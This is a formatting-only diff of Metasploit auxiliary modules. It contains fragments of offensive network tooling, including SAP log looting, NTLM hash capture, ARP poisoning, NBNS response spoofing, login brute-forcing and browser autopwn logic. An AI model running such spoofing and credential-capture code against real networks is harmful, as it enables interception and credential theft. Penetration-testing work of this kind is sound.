:data => "Account Password Grace Time: #{pgt}"
)
end
break if good

2
modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb
View File

@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary
:port => rport,
:type => 'sap.users',
:data => {:proto => "soap", :users => users},
:update => :unique_data
:update => :unique_data
)
users.each do |output|

10
modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb
View File

@ -143,8 +143,14 @@ class Metasploit3 < Msf::Auxiliary
if success
print_good("#{rhost}:#{rport} [SAP] #{datastore['FILETYPE'].downcase}:#{datastore['RFILE'].downcase} looted")
store_loot("sap.#{datastore['FILETYPE'].downcase}file", "text/xml", rhost, res.body, "sap_#{datastore['RFILE'].downcase}.xml",
"SAP Get Logfile")
store_loot(
"sap.#{datastore['FILETYPE'].downcase}file",
"text/xml",
rhost,
res.body,
"sap_#{datastore['RFILE'].downcase}.xml",
"SAP Get Logfile"
)
elsif fault
print_error("#{rhost}:#{rport} [SAP] Errorcode: #{faultcode}")
return

10
modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb
View File

@ -143,8 +143,14 @@ class Metasploit3 < Msf::Auxiliary
"Size",
"Timestamp"
])
store_loot("sap.#{datastore['FILETYPE'].downcase}file", "text/xml", rhost, saptbl.to_s, "sap_listlogfiles.xml",
"SAP #{datastore['FILETYPE'].downcase}")
store_loot(
"sap.#{datastore['FILETYPE'].downcase}file",
"text/xml",
rhost,
saptbl.to_s,
"sap_listlogfiles.xml",
"SAP #{datastore['FILETYPE'].downcase}"
)
env.each do |output|
saptbl << [ output[0], output[1], output[2] ]

3
modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb
View File

@ -51,8 +51,7 @@ class Metasploit3 < Msf::Auxiliary
res = send_request_cgi({
'uri' => "/#{datastore['URI']}",
'method' => 'GET',
'headers' =>
{
'headers' => {
'User-Agent' => datastore['UserAgent']
}
}, 25)

22
modules/auxiliary/scanner/sap/sap_service_discovery.rb
View File

@ -51,16 +51,18 @@ class Metasploit3 < Msf::Auxiliary
# Default ports based on SAP "TCP/IP Ports Used by SAP Applications" Document
# http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/library/uuid/4e515a43-0e01-0010-2da1-9bcc452c280b
def_ports = ['32NN', '33NN', '48NN', '80NN', '36NN', '81NN', '5NN00', '5NN01', '5NN02',
'5NN03', '5NN04', '5NN05', '5NN06', '5NN07', '5NN08', '5NN10', '5NN16',
'5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '21212', '21213', '59975',
'59976', '4238', '4239','4240', '4241', '3299', '3298', '515', '7200',
'7210', '7269', '7270', '7575', '5NN15', '39NN', '3909', '4NN00', '8200',
'8210', '8220', '8230', '4363', '4444', '4445', '9999', '3NN01', '3NN02',
'3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08', '3NN11', '3NN17',
'20003', '20004', '20005', '20006', '20007', '31596', '31597', '31602',
'31601', '31604', '2000', '2001', '2002', '8355', '8357', '8351' ,'8352',
'8353', '8366', '1090', '1095', '20201', '1099', '1089']
def_ports = [
'32NN', '33NN', '48NN', '80NN', '36NN', '81NN', '5NN00', '5NN01', '5NN02',
'5NN03', '5NN04', '5NN05', '5NN06', '5NN07', '5NN08', '5NN10', '5NN16',
'5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '21212', '21213', '59975',
'59976', '4238', '4239','4240', '4241', '3299', '3298', '515', '7200',
'7210', '7269', '7270', '7575', '5NN15', '39NN', '3909', '4NN00', '8200',
'8210', '8220', '8230', '4363', '4444', '4445', '9999', '3NN01', '3NN02',
'3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08', '3NN11', '3NN17',
'20003', '20004', '20005', '20006', '20007', '31596', '31597', '31602',
'31601', '31604', '2000', '2001', '2002', '8355', '8357', '8351' ,'8352',
'8353', '8366', '1090', '1095', '20201', '1099', '1089'
]
ports = []
# Build ports array from valid instance numbers

2
modules/auxiliary/scanner/smb/smb_login.rb
View File

@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary
datastore["SMBDomain"] = orig_domain
return :skip_user
else
raise e
raise e
end
rescue ::Rex::Proto::SMB::Exceptions::LoginError => e

8
modules/auxiliary/scanner/smtp/smtp_enum.rb
View File

@ -22,7 +22,13 @@ class Metasploit3 < Msf::Auxiliary
super(
'Name' => 'SMTP User Enumeration Utility',
'Version' => '$Revision$',
'Description' => %q{The SMTP service has two internal commands that allow the enumeration of users: VRFY (confirming the names of valid users) and EXPN (which reveals the actual address of users aliases and lists of e-mail (mailing lists)). Through the implementation of these SMTP commands can reveal a list of valid users.},
'Description' => %q{
The SMTP service has two internal commands that allow the enumeration
of users: VRFY (confirming the names of valid users) and EXPN (which
reveals the actual address of users aliases and lists of e-mail
(mailing lists)). Through the implementation of these SMTP commands can
reveal a list of valid users.
},
'References' =>
[
['URL', 'http://www.ietf.org/rfc/rfc2821.txt'],

6
modules/auxiliary/scanner/snmp/snmp_login.rb
View File

@ -155,7 +155,11 @@ class Metasploit3 < Msf::Auxiliary
# Used to flag whether this version was compatible
finished = true
rescue ::SNMP::UnsupportedPduTag, ::SNMP::InvalidPduTag, ::SNMP::ParseError, ::SNMP::InvalidErrorStatus, ::SNMP::InvalidTrapVarbind, ::SNMP::InvalidGenericTrap, ::SNMP::BER::OutOfData, ::SNMP::BER::InvalidLength, ::SNMP::BER::InvalidTag, ::SNMP::BER::InvalidObjectId, ::SNMP::MIB::ModuleNotLoadedError, ::SNMP::UnsupportedValueTag
rescue ::SNMP::UnsupportedPduTag, ::SNMP::InvalidPduTag, ::SNMP::ParseError,
::SNMP::InvalidErrorStatus, ::SNMP::InvalidTrapVarbind, ::SNMP::InvalidGenericTrap,
::SNMP::BER::OutOfData, ::SNMP::BER::InvalidLength, ::SNMP::BER::InvalidTag,
::SNMP::BER::InvalidObjectId, ::SNMP::MIB::ModuleNotLoadedError,
::SNMP::UnsupportedValueTag
next
rescue ::SNMP::UnsupportedVersion

6
modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb
View File

@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary
next if key =~ /Proc-Type:.*ENCRYPTED/
this_key = key.gsub(/\x0d/,"")
next if cleartext_keys.include? this_key
cleartext_keys << this_key
cleartext_keys << this_key
end
if cleartext_keys.empty?
print_error "#{ip}:#{rport} SSH - No valid cleartext keys found"
@ -260,11 +260,11 @@ class Metasploit3 < Msf::Auxiliary
)
end
# Sometimes all we have is a SSH_KEYFILE_B64 string. If it's
# Sometimes all we have is a SSH_KEYFILE_B64 string. If it's
# good, then store it as loot for this user@host, unless we
# already have it in loot.
def store_keyfile_b64_loot(ip,user,key_id)
return unless db
return unless db
return if @keyfile_path
return if datastore["SSH_KEYFILE_B64"].to_s.empty?
keyfile = datastore["SSH_KEYFILE_B64"].unpack("m*").first

2
modules/auxiliary/scanner/voice/recorder.rb
View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
c = create_call
begin
::Timeout.timeout( datastore['CALL_TIME'] ) do
::Timeout.timeout( datastore['CALL_TIME'] ) do
print_status("Dialing #{number}...")
r = c.dial(number)
if not c

12
modules/auxiliary/server/browser_autopwn.rb
View File

@ -303,7 +303,7 @@ class Metasploit3 < Msf::Auxiliary
# Reloading failed
unless @exploits[name]
@exploits.delete(name)
return
return
end
apo = @exploits[name].class.autopwn_opts
@ -318,7 +318,7 @@ class Metasploit3 < Msf::Auxiliary
lport = @win_lport
=begin
#
# Some day, we'll support Linux and Mac OS X here..
# Some day, we'll support Linux and Mac OS X here..
#
when %r{linux}
@ -633,7 +633,7 @@ class Metasploit3 < Msf::Auxiliary
#
# Build some javascript that attempts to determine which exploits to run
# for the victim's OS and browser.
#
#
# Returns a raw javascript string to be eval'd on the victim
#
def build_script_response(cli, request)
@ -762,7 +762,7 @@ class Metasploit3 < Msf::Auxiliary
# Skip exploits that don't match the client's OS.
if (host_info and host_info[:os_name] and s[:os_name])
# Host os normalization will set os_name to "Unknown"
# if it has no fingerprinting info.
# if it has no fingerprinting info.
#
# See lib/msf/core/model/host.rb
if host_info[:os_name] != "Unknown"
@ -819,7 +819,7 @@ class Metasploit3 < Msf::Auxiliary
return response
end
#
#
# Yields each module that exports autopwn_info, filtering on MATCH and EXCLUDE options
#
def each_autopwn_module(&block)
@ -851,7 +851,7 @@ class Metasploit3 < Msf::Auxiliary
# don't need to bother sending it.
#
def client_matches_browser(client_info, browser)
if client_info and browser and client_info[:ua_name]
if client_info and browser and client_info[:ua_name]
if browser != "generic" and client_info[:ua_name] != browser
return false
end

14
modules/auxiliary/server/capture/http_ntlm.rb
View File

@ -229,8 +229,8 @@ class Metasploit3 < Msf::Auxiliary
end
when NTLM_CONST::NTLM_V2_RESPONSE
if NTLM_CRYPT::is_hash_from_empty_pwd?({:hash => [nt_hash].pack("H*"),:srv_challenge => @challenge,
:cli_challenge => [nt_cli_challenge].pack("H*"),
:user => Rex::Text::to_ascii(user),
:cli_challenge => [nt_cli_challenge].pack("H*"),
:user => Rex::Text::to_ascii(user),
:domain => Rex::Text::to_ascii(domain),
:ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE, :type => 'ntlm' })
print_status("NTLMv2 Hash correspond to an empty password, ignoring ... ")
@ -240,8 +240,8 @@ class Metasploit3 < Msf::Auxiliary
lm_hash_message = "Disabled"
lm_chall_message = 'Disabled'
elsif NTLM_CRYPT::is_hash_from_empty_pwd?({:hash => [lm_hash].pack("H*"),:srv_challenge => @challenge,
:cli_challenge => [lm_cli_challenge].pack("H*"),
:user => Rex::Text::to_ascii(user),
:cli_challenge => [lm_cli_challenge].pack("H*"),
:user => Rex::Text::to_ascii(user),
:domain => Rex::Text::to_ascii(domain),
:ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE, :type => 'lm' })
lm_hash_message = "Disabled (from empty password)"
@ -300,7 +300,7 @@ class Metasploit3 < Msf::Auxiliary
print_status(capturelogmessage)
# DB reporting
# Rem : one report it as a smb_challenge on port 445 has breaking those hashes
# Rem : one report it as a smb_challenge on port 445 has breaking those hashes
# will be mainly use for psexec / smb related exploit
report_auth_info(
:host => ip,
@ -320,7 +320,7 @@ class Metasploit3 < Msf::Auxiliary
#end
if(datastore['CAINPWFILE'] and user)
if ntlm_ver == NTLM_CONST::NTLM_V1_RESPONSE or ntlm_ver == NTLM_CONST::NTLM_2_SESSION_RESPONSE
if ntlm_ver == NTLM_CONST::NTLM_V1_RESPONSE or ntlm_ver == NTLM_CONST::NTLM_2_SESSION_RESPONSE
fd = File.open(datastore['CAINPWFILE'], "ab")
fd.puts(
[
@ -337,7 +337,7 @@ class Metasploit3 < Msf::Auxiliary
if(datastore['JOHNPWFILE'] and user)
case ntlm_ver
when NTLM_CONST::NTLM_V1_RESPONSE, NTLM_CONST::NTLM_2_SESSION_RESPONSE
when NTLM_CONST::NTLM_V1_RESPONSE, NTLM_CONST::NTLM_2_SESSION_RESPONSE
fd = File.open(datastore['JOHNPWFILE'] + '_netntlm', "ab")
fd.puts(

6
modules/auxiliary/server/capture/imap.rb
View File

@ -66,9 +66,11 @@ class Metasploit3 < Msf::Auxiliary
num,cmd,arg = data.strip.split(/\s+/, 3)
arg ||= ""
if(cmd.upcase == "CAPABILITY")
c.put "* CAPABILITY IMAP4 IMAP4rev1 IDLE LOGIN-REFERRALS MAILBOX-REFERRALS NAMESPACE LITERAL+ UIDPLUS CHILDREN UNSELECT QUOTA XLIST XYZZY LOGIN-REFERRALS AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 AUTH=XYMPKI AUTH=XYMECOOKIE ID\r\n"
c.put "* CAPABILITY IMAP4 IMAP4rev1 IDLE LOGIN-REFERRALS " +
"MAILBOX-REFERRALS NAMESPACE LITERAL+ UIDPLUS CHILDREN UNSELECT " +
"QUOTA XLIST XYZZY LOGIN-REFERRALS AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 " +
"AUTH=XYMPKI AUTH=XYMECOOKIE ID\r\n"
c.put "#{num} OK CAPABILITY completed.\r\n"
end

44
modules/auxiliary/spoof/arp/arp_poisoning.rb
View File

@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
def run
open_pcap({'SNAPLEN' => 68, 'FILTER' => "arp[6:2] == 0x0002"})
@netifaces = true
if not netifaces_implemented?
if not netifaces_implemented?
print_error("WARNING : Pcaprub is not uptodate, some functionality will not be available")
@netifaces = false
end
@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
@interface = datastore['INTERFACE'] || Pcap.lookupdev
#This is needed on windows cause we send interface directly to Pcap functions
@interface = get_interface_guid(@interface)
@smac = datastore['SMAC']
@smac = datastore['SMAC']
@smac ||= get_mac(@interface) if @netifaces
raise RuntimeError ,'Source Mac should be defined' unless @smac
raise RuntimeError ,'Source Mac is not in correct format' unless is_mac?(@smac)
@ -118,10 +118,10 @@ class Metasploit3 < Msf::Auxiliary
print_status("RE-ARPing the victims...")
3.times do
@dsthosts_cache.keys.sort.each do |dhost|
dmac = @dsthosts_cache[dhost]
dmac = @dsthosts_cache[dhost]
if datastore['BIDIRECTIONAL']
@srchosts_cache.keys.sort.each do |shost|
smac = @srchosts_cache[shost]
smac = @srchosts_cache[shost]
if shost != dhost
print_status("Sending arp packet for #{shost} to #{dhost}") if datastore['VERBOSE']
reply = buildreply(shost, smac, dhost, dmac)
@ -144,7 +144,7 @@ class Metasploit3 < Msf::Auxiliary
@srchosts_cache.keys.sort.each do |shost|
smac = @srchosts_cache[shost]
@dsthosts_cache.keys.sort.each do |dhost|
dmac = @dsthosts_cache[dhost]
dmac = @dsthosts_cache[dhost]
if shost != dhost
print_status("Sending arp packet for #{dhost} to #{shost}") if datastore['VERBOSE']
reply = buildreply(dhost, dmac, shost, smac)
@ -155,7 +155,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end # 3.times
end
end
close_pcap
end #begin/rescue/ensure
end
@ -178,7 +178,7 @@ class Metasploit3 < Msf::Auxiliary
dhosts_range = Rex::Socket::RangeWalker.new(datastore['DHOSTS'])
@dhosts = []
dhosts_range.each{|dhost| if is_ipv4? dhost and dhost != @sip then @dhosts.push(dhost) end}
dhosts_range.each{|dhost| if is_ipv4? dhost and dhost != @sip then @dhosts.push(dhost) end}
#Build the local dest hosts cache
print_status("Building the destination hosts cache...")
@ -192,7 +192,7 @@ class Metasploit3 < Msf::Auxiliary
next if not reply.is_arp?
#Without this check any arp request would be added to the cache
if @dhosts.include? reply.arp_saddr_ip
print_status("#{reply.arp_saddr_ip} appears to be up.")
print_status("#{reply.arp_saddr_ip} appears to be up.")
report_host(:host => reply.arp_saddr_ip, :mac=>reply.arp_saddr_mac)
@dsthosts_cache[reply.arp_saddr_ip] = reply.arp_saddr_mac
end
@ -205,7 +205,7 @@ class Metasploit3 < Msf::Auxiliary
while(reply = getreply())
next if not reply.is_arp?
if @dhosts.include? reply.arp_saddr_ip
print_status("#{reply.arp_saddr_ip} appears to be up.")
print_status("#{reply.arp_saddr_ip} appears to be up.")
report_host(:host => reply.arp_saddr_ip, :mac=>reply.arp_saddr_mac)
@dsthosts_cache[reply.arp_saddr_ip] = reply.arp_saddr_mac
end
@ -233,7 +233,7 @@ class Metasploit3 < Msf::Auxiliary
while(reply = getreply())
next if not reply.is_arp?
if @shosts.include? reply.arp_saddr_ip
print_status("#{reply.arp_saddr_ip} appears to be up.")
print_status("#{reply.arp_saddr_ip} appears to be up.")
report_host(:host => reply.arp_saddr_ip, :mac=>reply.arp_saddr_mac)
@srchosts_cache[reply.arp_saddr_ip] = reply.arp_saddr_mac
end
@ -246,7 +246,7 @@ class Metasploit3 < Msf::Auxiliary
while(reply = getreply())
next if not reply.is_arp?
if @shosts.include? reply.arp_saddr_ip
print_status("#{reply.arp_saddr_ip} appears to be up.")
print_status("#{reply.arp_saddr_ip} appears to be up.")
report_host(:host => reply.arp_saddr_ip, :mac=>reply.arp_saddr_mac)
@srchosts_cache[reply.arp_saddr_ip] = reply.arp_saddr_mac
end
@ -283,10 +283,10 @@ class Metasploit3 < Msf::Auxiliary
@mutex_cache.unlock
end
@dsthosts_cache.keys.sort.each do |dhost|
dmac = @dsthosts_cache[dhost]
dmac = @dsthosts_cache[dhost]
if datastore['BIDIRECTIONAL']
@srchosts_cache.keys.sort.each do |shost|
smac = @srchosts_cache[shost]
smac = @srchosts_cache[shost]
if shost != dhost
print_status("Sending arp packet for #{shost} to #{dhost}") if datastore['VERBOSE']
reply = buildreply(shost, @smac, dhost, dmac)
@ -310,7 +310,7 @@ class Metasploit3 < Msf::Auxiliary
@srchosts_cache.keys.sort.each do |shost|
smac = @srchosts_cache[shost]
@dsthosts_cache.keys.sort.each do |dhost|
dmac = @dsthosts_cache[dhost]
dmac = @dsthosts_cache[dhost]
if shost != dhost
print_status("Sending arp packet for #{dhost} to #{shost}") if datastore['VERBOSE']
reply = buildreply(dhost, @smac, shost, smac)
@ -379,7 +379,7 @@ class Metasploit3 < Msf::Auxiliary
args[:localip] = @sip.dup
@listener = Thread.new(args) do |args|
begin
#one more local copy
#one more local copy
liste_src_ips = []
if args[:BIDIRECTIONAL]
args[:shosts].each_key {|address| liste_src_ips.push address}
@ -400,22 +400,22 @@ class Metasploit3 < Msf::Auxiliary
if pkt.arp_opcode == 1
#check if the source ip is in the dest hosts
if (liste_dst_ips.include? pkt.arp_saddr_ip and liste_src_ips.include? pkt.arp_daddr_ip) or
(args[:BIDIRECTIONAL] and liste_dst_ips.include? pkt.arp_daddr_ip and liste_src_ips.include? pkt.arp_saddr_ip)
(args[:BIDIRECTIONAL] and liste_dst_ips.include? pkt.arp_daddr_ip and liste_src_ips.include? pkt.arp_saddr_ip)
print_status("Listener : Request from #{pkt.arp_saddr_ip} for #{pkt.arp_daddr_ip}") if datastore['VERBOSE']
reply = buildreply(pkt.arp_daddr_ip, @smac, pkt.arp_saddr_ip, pkt.eth_saddr)
3.times{listener_capture.inject(reply.to_s)}
elsif args[:AUTO_ADD]
if (@dhosts.include? pkt.arp_saddr_ip and not liste_dst_ips.include? pkt.arp_saddr_ip and
pkt.arp_saddr_ip != localip)
if (@dhosts.include? pkt.arp_saddr_ip and not liste_dst_ips.include? pkt.arp_saddr_ip and
pkt.arp_saddr_ip != localip)
@mutex_cache.lock
print_status("#{pkt.arp_saddr_ip} appears to be up.")
@dsthosts_autoadd_cache[pkt.arp_saddr_ip] = pkt.arp_saddr_mac
print_status("#{pkt.arp_saddr_ip} appears to be up.")
@dsthosts_autoadd_cache[pkt.arp_saddr_ip] = pkt.arp_saddr_mac
liste_dst_ips.push pkt.arp_saddr_ip
@mutex_cache.unlock
elsif (args[:BIDIRECTIONAL] and @shosts.include? pkt.arp_saddr_ip and
elsif (args[:BIDIRECTIONAL] and @shosts.include? pkt.arp_saddr_ip and
not liste_src_ips.include? pkt.arp_saddr_ip and pkt.arp_saddr_ip != localip)
@mutex_cache.lock
print_status("#{pkt.arp_saddr_ip} appears to be up.")
print_status("#{pkt.arp_saddr_ip} appears to be up.")
@srchosts_autoadd_cache[pkt.arp_saddr_ip] = pkt.arp_saddr_mac
liste_src_ips.push pkt.arp_saddr_ip
@mutex_cache.unlock

6
modules/auxiliary/spoof/cisco/dtp.rb
View File

@ -68,14 +68,14 @@ class Metasploit3 < Msf::Auxiliary
print_error 'Source MAC (SMAC) should be defined'
else
unless is_mac? smac()
print_error "Source MAC (SMAC) `#{smac}' is badly formatted."
print_error "Source MAC (SMAC) `#{smac}' is badly formatted."
else
print_status "Starting DTP spoofing service..."
open_pcap({'FILTER' => "ether host 01:00:0c:cc:cc:cc"})
interface = datastore['INTERFACE'] || Pcap.lookupdev
dtp = build_dtp_frame()
@run = true
while @run
@run = true
while @run
capture.inject(dtp.to_s)
select(nil, nil, nil, 60)
end

10
modules/auxiliary/spoof/nbns/nbns_response.rb
View File

@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
'Description' => %q{
This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests
sent to the local subnet's broadcast address and spoof a response, redirecting the querying
machine to an IP of the attacker's choosing. Combined with auxiliary/capture/server/smb or
machine to an IP of the attacker's choosing. Combined with auxiliary/capture/server/smb or
capture/server/http_ntlm it is a highly effective means of collecting crackable hashes on
common networks.
@ -114,8 +114,8 @@ class Metasploit3 < Msf::Auxiliary
end
# time to build a response packet - Oh YEAH!
response = nbnsq_transid +
"\x85\x00" + # Flags = response + authoratative + recursion desired +
response = nbnsq_transid +
"\x85\x00" + # Flags = response + authoratative + recursion desired +
"\x00\x00" + # Questions = 0
"\x00\x01" + # Answer RRs = 1
"\x00\x00" + # Authority RRs = 0
@ -128,13 +128,13 @@ class Metasploit3 < Msf::Auxiliary
"\x00\x00" + # Flags B-node, unique = whet ever that means
datastore['SPOOFIP'].split('.').collect(&:to_i).pack('C*')
open_pcap
open_pcap
p = PacketFu::UDPPacket.new
p.ip_saddr = Rex::Socket.source_address(rhost)
p.ip_daddr = rhost
p.ip_ttl = 255
p.udp_sport = 1337
p.udp_sport = 1337
p.udp_dport = 137
p.payload = response
p.recalc

12
modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb
View File

@ -26,12 +26,12 @@ class Metasploit3 < Msf::Auxiliary
]
)
register_options(
[
OptString.new('DNS_SERVER',[false, "Specifies a DNS Server"]),
OptInt.new('COUNT', [false, "Number of intervals to loop",1]),
OptInt.new('DELAY', [false, "Delay in seconds between intervals",3])
],self.class)
end
[
OptString.new('DNS_SERVER',[false, "Specifies a DNS Server"]),
OptInt.new('COUNT', [false, "Number of intervals to loop",1]),
OptInt.new('DELAY', [false, "Delay in seconds between intervals",3])
],self.class)
end
def run
@res = Net::DNS::Resolver.new()

12
modules/auxiliary/vsploit/malware/dns/dns_zeus.rb
View File

@ -26,12 +26,12 @@ class Metasploit3 < Msf::Auxiliary
]
)
register_options(
[
OptString.new('DNS_SERVER',[false, "Specifies a DNS Server"]),
OptInt.new('COUNT', [false, "Number of intervals to loop",1]),
OptInt.new('DELAY', [false, "Delay in seconds between intervals",3])
],self.class)
end
[
OptString.new('DNS_SERVER',[false, "Specifies a DNS Server"]),
OptInt.new('COUNT', [false, "Number of intervals to loop",1]),
OptInt.new('DELAY', [false, "Delay in seconds between intervals",3])
],self.class)
end
def run
@res = Net::DNS::Resolver.new()

9
modules/auxiliary/vsploit/pii/web_pii.rb
View File

@ -44,8 +44,7 @@ class Metasploit3 < Msf::Auxiliary
def create_page
# Webpage Title
title = "vSploit PII Webserver"
sheep =
"
sheep =<<EOF
__________
< baaaaah! >
---------
@ -55,14 +54,14 @@ class Metasploit3 < Msf::Auxiliary
;@;@( \\@;@;@;@;@;@,
/x @\\_|@;@;@;@;@;@;,
/ )@:@;@;@;@;@;@;@|)
*---;@;@;@;@;@;@;@;@;
*---;@;@;@;@;@;@;@;@;
';@;\;@;\;@;@
|| | \\ (
|| | // /
// ( // /
~~~~~ ~~~~
~~~~~ ~~~~
"
EOF
page = ""
page << "<html>\n<head>\n"